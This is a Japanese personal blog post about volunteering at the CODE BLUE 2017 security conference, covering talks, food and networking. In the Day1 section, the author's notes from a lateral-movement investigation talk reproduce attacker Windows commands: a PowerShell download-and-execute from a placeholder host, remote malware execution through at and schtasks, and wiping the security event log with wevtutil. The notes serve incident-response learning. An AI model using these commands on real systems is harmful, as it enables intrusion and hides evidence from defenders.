/var/log/Sawada.log

SAINO中毒患者の備忘録。

CODE BLUE 2017 学生スタッフとして参加してきました

Security

はじめに

11月9,10日に東京・ベルサール新宿グランドでCODE BLUEと呼ばれる情報セキュリティの国際会議*1がありました。10月上旬に採用の連絡があり、学生スタッフとして参加する機会に恵まれたので、ここに参加記を残しておきます。

まず、参加しようと思った一番のきっかけはセキュリティ関連の方々と親交を深めたかったからです。sechack365を通じて業界の事を更に知りたいと思うようになりました。また、早期で38,000円(当日は120,000円...)もする国際会議へ学生スタッフなら1日分タダで聴講できる点も魅力。

いつもどおりの目次です。

Day0 11/8

この日は集合が14:30に新宿だったのですが、不慮の事故で会場行けなくなるのが嫌だったので早めの飛行機にしました。天候不順の所為かずっとシートベルトサインが消えないままのフライトは初めてでした。いわゆる「チンさむ」を幾度となく繰り返しながら羽田へ。寿命縮まった...

集合に指定された会場に着くと、スタッフTシャツを貰いました。かっこいい!

その後は、CODE BLUEのスポンサー企業の方々と懇親会や当日の業務説明などがありました。あとは軽い自己紹介。皆、セキュリティ系の研究をしていて正直羨ましいと感じてしまいました。懇親会ではスポンサーの方々から業務内容や面白い話を伺うことが出来、今後の方向性でもアドバイスを頂きました。sechack365の大阪回でも会えるそうなので楽しみです。(進捗はダメ...)

夜は安定のラーメン。飲み会は移動で疲れてたので遠慮してしまいました。

Day1 11/9

ホテルの朝食が美味しくてすぐに目が覚めました。 f:id:takuzoo3868:20171114114216j:plain この日はシフトではなかったので、講演を聞いたり企業ブースを巡ったり、コンテスト会場を見学したり思いっきり楽しんだ一日でした。 f:id:takuzoo3868:20171114115008j:plain 下の節で二つほど取り上げてみますが、それ以外にも

など、面白い発表が沢山ありました。そのうちgistに講演メモはアップロードします。

サイバースペースにおける国家主権

最初の基調講演はNATO法律顧問であるPatrick O'Keeffe氏。国家主権の境界線が曖昧なサイバー空間でどのように対応すべきか、と言った内容だったと思います。サイバー空間には3つのレイヤーがあるそうです。

現状の問題は各国で適用の異なる国際法国連憲章をサイバー空間に落とし込む方法だそう。事実サイバースパイが暗躍していますが、必ずしも悪とは限らず、警察の取り締まりでは厳しいのかな。なぜかというと、境界のはっきりしない空間ではグレーゾーンが余りにも広いから。氏の主張する対策手法は官民連携でした。政府主導の機関では最早対応は手遅れであり、社会でのソリューション経験が豊富な民間企業との協力こそが最善であると。

日本では何かあると政府は大学教授などの専門家を有識者として招集しますが、限定的な有識者は方向性に偏りが生じやすくよろしくない。この様な仕組みでは駄目なんでしょうね...。軍事領域でみたサイバー空間の関わり方を示した図は興味深いものでした。ケーススタディ黒海で起きたGPS干渉(spoofing)の話*2や、英国原子力潜水艦のハッキング被害*3などでした。海上で運用されているAIS*4GPS以外のロケーションシステムBeiDouやGalileoにも必ず小さな脆弱性は存在すると考え、広義の意味で「人」レイヤーにおける意思疎通や認識、学習を通じて主権の境界線を決めていくべき、だそうです。ハッキング被害の最前線は防衛関係だと思うのですが、日本だとどうしても平和憲法のせいで複雑な状況になってしまうので、実例をもとにしたお話を聞くことが出来、とても為になりました。全部英語聴講チャレンジしたけど半分くらいしか理解できてないかも。

行動パターンに基づく横断的侵害の把握と調査

この講演はAPT攻撃*5における後半過程、即ちLateral Movementを調査するためのTipsといった話でした。まだ企業に勤めていないので、この手の内容は実用的なのかわかりませんが、Windows系OSにおけるHacking Scenarioを詳しく解説されていましたので、個人的に興味深かったです。

Lateral Movementとは既にhackingによって企業などのネットワークに侵入されてしまった段階を指します。この段階になると大体<(^q^)>となってしまいインシデントレスポンスも大変なようです。

  • 膨大なホスト調査
  • 意図的なログの消失
  • 検知されずに事態は深刻化

以上の点から実態把握も大変。なのでログの設定をしっかりしましょうといった感じでしょうか...。なぜ検知されないのかというと、Windowsの正規コマンドの利用割合が高いから。正規コマンドって検知対象から除外されているんですね。一連の流れがそれなりに決まっているなら、制限をかける方法もありそうなんですがどうなんでしょう...。また、講演では実際の使用例などの紹介もあり、スライドを眺めていて楽しかったです。咄嗟に走り書きしたからメモが汚いけど、以下に載せておきます(間違いがあったらごめんなさい)。

> echo @echo off >ee.bat
> echo for /l %%i in (1,1,225) do ping -n 1 10.0.0.%%i ^|find "TTL=" ^>^>rr.txt >>ee.bat
> type ee.bat
> ee.bat

スクリプトファイルの作成 = echo

> echo $p = New-Object System.Net.WebClient > xz.ps1
> echo $p.DownloadFile("http://xxxxxx.com/wp/0122.bat", "c:\intel\logs0122.exe") >> xz.ps1
> type xz.ps1
> powershell -ExecutionPolicy ByPass -File C:\intel\logs\xz.ps1

イベントログの中身を調査 --> ユーザーの一覧等を取得 = dumpel LogParser cscript

> dumpel.exe -f ac1.bat -l security -s \\10.0.0.1 -d 10

> LogParser ""Select *From V:\Server\Security.evtx EventID=4624 AND TimeGenerated < '2017-04-28 23:59:59' AND TimeGenerated > '2017-04-28 00:00:00'"" -i:evt -o:csv > V:\Server\Security.csv"

> cscript eventquery.vbs /s 10.0.1.11 /l application /fi "id eq 22"
  • 感染拡大
    at move schtasks copy ren reg wmic powershell など
    リモートの端末に対してファイル実行 = at schtasks
> at \\[IP Address] 12:00 cmd /c "C:\windows\tmpmal.exe"

> schtasks /create /tn [Task Name] /tr C:\1.bat /sc onstart /ru System /s [IP Address]
  • 痕跡削除
    del taskkill klist wevtutil など
rem イベントログの削除
> wevtutil cl security

rem ログオンイベントログの検索
> wevtutil qe security /f:text /q:""*[System[EventID=4624 or EventID=4769 or EventID=4672 or EventID=4768]] and *[System[TimeCreated[@SystemTime>='2017-07-10T00:00:00.000']]]""
> c:\windows\system32\log.txt

rem 起動イベントログの検索
> wevtutil qe system/count:20 /rd:true /f:text /q:""Event[System[(EventID=6005)]"" |find ""Date"" > inf.txt
  • 食事
    昼は@Yusuke_alive さんに教えてもらったカレーのお店へ。前払いだけど食べ放題なのが凄い。 f:id:takuzoo3868:20171114114532j:plain 夜は念願の風雲児のつけ麵。めっちゃ美味しかった...

Day2 11/10

スタッフとして仕事の日です。自分の担当は誘導と同時通訳レシーバーの回収でした。あとは...外の業務で冷えた体をケンタロウさんと筋トレしながら温めたり、5階コンテスト会場の雑務を手伝ったりしていました。レシーバー回収時は担当trackの講演内容をちらっと聞くことが出来ました。Androidカーネルバグ(CVE-2017-0403)をエクスプロイトする新しい手法と、開発した脆弱性診断ツールを用いてストアで配布されているアプリを診断した報告だったような気がします。最後にゲリラ診断していたのが印象的でした。

最後のシフトも会場のシレーバー回収だったので、George Hotz氏の基調講演を少し聞くことができました。ざっくり言うとJailbreaking Honda and Tokyo Cars。実際の車において、ハンドル操作に必要な力を電動でアシストして操舵力を軽くするEPSへデータを送るとき、メーカー毎にfirmwareの暗号化手法が異なるようですが簡単に解析できちゃうよという話もありました。Jailbreak というと iOS の脱獄をイメージしていたのですが、メーカーが導入していない機能を入れるといった意味合いだったようです。何よりオープンソースとして開発を進めている点がOSCスタッフとしては大好きです。Toyota Crypto 300は解いたら🐼貰えるそう。自動車分野は複雑な制御機構が絡む分、ネットワークに割けるリソースも少ないのかな。だからこそ、技術革新が他分野と比べて緩やかなのかもしれないですね。面白い内容だった!!!

クロージングの後のNetworking Partyは講演者やコンテスト上位者、スタッフ、参加者を交えた大規模な懇親会でした。場の空気に圧倒されながらも、ぼっち飯をしていたら折角北海道から来た意味がないので、かなり図々しい気もしましたが...まっちゃさんにお願いして、業界の偉い方々を沢山紹介して貰いました。貴重な時間を割いて頂き本当にありがとうございました!!! その後は、冬のインターンシップの話を聞いたり、NICTの井上さんに可視化の助言を頂いたり、登壇者の方に英語でアタックしてみて自分のコニュニケーション(特に専門用語での会話)能力の無さに落ち込んだり...それでも名刺交換して頂き凄く嬉しかったです。もっと、英会話を楽しく且つできるようになりたいと強く感じました。

CODEBLUEスタッフの打ち上げは新宿にあるダーツバーで開催。一昨年の学生大会以来すっかり投げてないなぁと思ったり。Patrick氏やDEFCONのハッカーを交えてのカウントアップでした。打ち上げもコアスタッフの方々に全額奢っていただきました、ご馳走様です🙏

おわりに

ちょっと睡眠不足だったけど、刺激的な3日間でした。NOCのスタッフに高校時代の同期が参加していて凄いなぁと。もっと自分も頑張らなきゃ。同時通訳を使わなくても、それなりに内容はわかるって事が判明したのが大きな収穫でした。それでも実際に英語を話すのは全く駄目だったので、もっと英会話の機会を増やさなきゃいけないのかも。 f:id:takuzoo3868:20171113183421j:plain

今回、学生スタッフは遠方からの参加者に対して宿泊場所の提供や、業務日の食事などサポートして頂きました。交通費こそ痛かったですが、本当に助かりました。この場を借りて、コアスタッフ、スポンサーの方々、並びに関係者各位へ厚く御礼申し上げます。

後記 東京観光とその他

まず、新千歳空港ANA手荷物カウンターが自動化しました。羽田でいつも便利だなと感じていたのでちょっと嬉しかったです。

Day0では集合場所の新宿に向かうはずが、間違って浅草方面に向かっていて少し焦りました(これだから田舎者...)。折角だから戻るついでにやけくそで観光しました。駆け足でもそれなりに楽しんだかなと思います。

f:id:takuzoo3868:20171114113711j:plain f:id:takuzoo3868:20171114113745j:plain f:id:takuzoo3868:20171114113859j:plain f:id:takuzoo3868:20171114114007j:plain

*1:世界トップクラスのセキュリティ専門家による日本発の情報セキュリティ国際会議

*2:http://jsapt.net/ja/post/17080002

*3:http://www.basicint.org/publications/stanislav-abaimov-paul-ingram-executive-director/2017/hacking-uk-trident-growing-threat

*4:Automatic Identification System

*5:高度で執拗かつ継続的な攻撃